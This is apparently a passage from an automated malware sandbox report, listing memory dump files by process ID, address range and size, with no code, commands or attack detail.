                                                                                                                  • memory/5212-352-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/5228-315-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/5228-340-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/5228-319-0x0000000000400000-0x00000000041D7000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    61.8MB

                                                                                                                  • memory/5256-243-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/5276-244-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/5304-368-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/5328-364-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/5468-248-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/5536-345-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/5552-361-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/5556-351-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/5592-251-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/5712-263-0x0000000000030000-0x000000000003C000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    48KB

                                                                                                                  • memory/5712-253-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/5752-343-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/5800-276-0x0000000000030000-0x0000000000039000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    36KB

                                                                                                                  • memory/5800-256-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/5800-270-0x0000000000400000-0x0000000003DA9000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    57.7MB

                                                                                                                  • memory/5808-257-0x0000000000400000-0x000000000040C000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    48KB

                                                                                                                  • memory/5808-258-0x0000000000402F68-mapping.dmp
                                                                                                                  • memory/5856-339-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/5868-347-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/5908-273-0x0000000000400000-0x00000000041D7000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    61.8MB

                                                                                                                  • memory/5908-272-0x0000000004B10000-0x000000000541B000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    9.0MB

                                                                                                                  • memory/5908-266-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/5972-366-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/6000-344-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/6084-358-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/6084-329-0x0000000007410000-0x0000000007411000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/6084-322-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/6100-302-0x0000000008C90000-0x0000000008C91000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/6100-286-0x00000000079D0000-0x00000000079D1000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/6100-296-0x0000000008190000-0x0000000008191000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/6100-275-0x0000000000000000-mapping.dmp
                                                                                                                  • memory/6100-288-0x0000000008320000-0x0000000008321000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/6100-304-0x0000000008A80000-0x0000000008A81000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/6100-287-0x00000000080D0000-0x00000000080D1000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/6100-289-0x0000000008390000-0x0000000008391000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/6100-283-0x00000000053E0000-0x00000000053E1000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/6100-285-0x00000000053E2000-0x00000000053E3000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/6100-328-0x00000000053E3000-0x00000000053E4000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/6100-282-0x0000000007AA0000-0x0000000007AA1000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/6100-281-0x00000000052A0000-0x00000000052A1000-memory.dmp
                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/6112-342-0x0000000000000000-mapping.dmp